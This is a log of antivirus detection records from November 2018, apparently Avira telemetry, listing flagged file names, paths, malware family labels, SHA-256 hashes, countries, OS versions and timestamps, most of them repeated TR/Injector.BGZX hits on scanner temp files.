  Row(detection=Row(filename='fwddklxh.exe', filepath='f:\\recycler\\s-7-5-57-0134166447-0306465866-823005636-0523\\fWdDKlXH.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054730-c1b31597', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054730-C1B31597', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055212-69e06683', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055212-69E06683', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052950-4a5dd73b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052950-4A5DD73B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050412-b54a1a62', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050412-B54A1A62', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051631-6e01ee9a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051631-6E01EE9A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061854-24dc2dc1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061854-24DC2DC1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060857-c1477c83', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060857-C1477C83', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053520-0eade92a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053520-0EADE92A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062054-6c7cc91b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062054-6C7CC91B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052928-3cdf4824', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052928-3CDF4824', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060554-54391a73', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060554-54391A73', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052959-4fc5ba5d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052959-4FC5BA5D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054211-03c8b12d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054211-03C8B12D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050958-83e62e04', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050958-83E62E04', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050432-c124dc55', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050432-C124DC55', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061633-d11d6fea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061633-D11D6FEA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054929-08ad7fd3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054929-08AD7FD3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055557-f0179d49', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055557-F0179D49', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052128-1f1f64e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052128-1F1F64E6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061938-3f313ab0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061938-3F313AB0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054650-a9f80879', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054650-A9F80879', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060328-fcbfb8c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060328-FCBFB8C8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052348-72959b26', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052348-72959B26', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051602-5c863135', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051602-5C863135', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052915-3590700d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052915-3590700D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052420-8578f881', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052420-8578F881', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062350-d53a436c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062350-D53A436C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054446-601cffaf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054446-601CFFAF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050611-fc9cb21d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050611-FC9CB21D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050630-07be693a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050630-07BE693A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053433-f305ac1e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053433-F305AC1E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051905-c9be7b23', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051905-C9BE7B23', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053538-19bb7efa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053538-19BB7EFA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060722-8870c388', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060722-8870C388', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051948-e30e1b57', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051948-E30E1B57', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054802-d5349ba0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054802-D5349BA0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060709-80ca9eb9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060709-80CA9EB9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055135-53c2bec2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055135-53C2BEC2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T10:43:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051243-e6398821', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051243-E6398821', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053425-edce5d16', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053425-EDCE5D16', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060742-9442a31b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060742-9442A31B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053726-59b9615d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053726-59B9615D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050823-4b5016d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050823-4B5016D9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054838-ea775f55', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054838-EA775F55', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T19:00:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055847-5593e5e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055847-5593E5E9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054347-3d031070', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054347-3D031070', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='84c64a4221c1fb7064d2bb13191e85200e9503f1926f2f1c7739fb807433d728', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\84C64A4221C1FB7064D2BB13191E85200E9503F1926F2F1C7739FB807433D728', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='84c64a4221c1fb7064d2bb13191e85200e9503f1926f2f1c7739fb807433d728', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:19:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060224-d6ad8d76', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060224-D6AD8D76', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T18:13:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='progrm.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\Borong\\PROGRM\\PROGRM.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0371114.exe', filepath='\\\\?\\C:\\System Volume Information\\_restore{93F7CC16-D4B7-42F9-9F19-AAFEFA01B068}\\RP1593\\A0371114.exe', filesize=716000, name='ADWARE/BrowseFox.Gen.#M300.#R6112'), hash='482c8ff314930973eb8e2c082863e98e8da13fceaf2ec3513278d5850a8dcc47', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:07:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hpqdirec.exe', filepath='C:\\Program Files (x86)\\HP\\Digital Imaging\\bin\\Hpqdirec.exe', filesize=960000, name='W32/Sality.AT.#M1.#R1'), hash='4e48d53297be073b4e003c906207e69ded2a507cfc02a83b5903027a1c207af0', metadata=Row(cmdline='-Embedding', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\HP\\Digital Imaging\\bin\\hpqbam08.exe', parentsize=559104, timestamp='2018-11-01T01:00:18Z'), dt=datetime.date(2018, 11, 1)),
